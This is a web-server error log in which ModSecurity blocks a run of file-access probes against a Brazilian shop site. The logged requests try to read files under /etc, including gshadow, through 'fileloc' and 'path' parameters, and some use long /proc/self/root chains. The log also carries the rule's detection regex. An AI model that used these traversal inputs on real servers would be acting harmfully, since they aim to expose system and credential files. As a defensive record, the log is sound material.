[Thu Mar 19 16:04:03.038602 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.82:56256] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIoxCii7xarUs8iHYOtwAAAgo"]
[Thu Mar 19 16:04:03.544139 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.112:56280] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIo_XLqtnMIWvjpaJC2AAAApI"]
[Thu Mar 19 16:04:04.354036 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.243.128:56816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIpPXLqtnMIWvjpaJC2gAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:04.731001 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.112:56318] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIpOoXxyEfFpUF8f8xIgAAAU8"]
[Thu Mar 19 16:04:05.743145 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:56828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIpeoXxyEfFpUF8f8xJAAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:05.743698 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.70:56350] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIpda6ubjKNq_cu4Z6hQAAA0I"]
[Thu Mar 19 16:04:07.201006 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:56834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIp_-YZRR_7pZ7nDKvXwAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:08.516523 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:56840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIqOoXxyEfFpUF8f8xJQAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:09.410460 2026] [:error] [pid 7235:tid 140411716749056] [client 57.141.18.78:56498] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIqfqxLDW4GITHUkSNaQAAAQM"]
[Thu Mar 19 16:04:09.831182 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.14:56512] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIqRCii7xarUs8iHYOvQAAAg0"]
[Thu Mar 19 16:04:11.369239 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.243.128:34502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIqfXLqtnMIWvjpaJC4AAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:11.371780 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.244.43:34898] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxIqhCii7xarUs8iHYOvgAAAgo"]
[Thu Mar 19 16:04:13.503047 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:34516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIreoXxyEfFpUF8f8xJwAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:14.129814 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53304] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:04:16.467032 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:34524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIsAkwaGbbGflqUZDv0QAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:16.652349 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.118:56744] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIsNa6ubjKNq_cu4Z6jAAAA0I"]
[Thu Mar 19 16:04:16.917122 2026] [:error] [pid 17887:tid 140411599251200] [client 57.141.18.21:56750] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIsAkwaGbbGflqUZDv0gAAANE"]
[Thu Mar 19 16:04:18.733771 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.105:56806] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIsta6ubjKNq_cu4Z6jgAAA04"]
[Thu Mar 19 16:04:18.768613 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.57:56808] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIsta6ubjKNq_cu4Z6jwAAA04"]
[Thu Mar 19 16:04:20.275365 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.91:56826] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIs_XLqtnMIWvjpaJC5wAAAoM"]
[Thu Mar 19 16:04:22.171016 2026] [:error] [pid 27293:tid 140411557287680] [client 57.141.18.33:56934] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxItv-YZRR_7pZ7nDKvbgAAA9Y"]
[Thu Mar 19 16:04:22.682853 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.228.61:52998] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxItvqxLDW4GITHUkSNcgAAAQU"]
[Thu Mar 19 16:04:24.611442 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.243.128:40600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIuPXLqtnMIWvjpaJC7gAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:24.786150 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.54:57042] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIuNa6ubjKNq_cu4Z6lQAAA04"]
[Thu Mar 19 16:04:26.275952 2026] [:error] [pid 19655:tid 140411708356352] [client 57.141.18.82:57088] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIuk1ujooLWdUDGy75jgAAAEQ"]
[Thu Mar 19 16:04:26.407766 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.124:57094] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIuhCii7xarUs8iHYOxgAAAgo"]
[Thu Mar 19 16:04:26.931912 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:40604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIugkwaGbbGflqUZDv1wAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:27.863499 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.36:57142] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIu9a6ubjKNq_cu4Z6mwAAA04"]
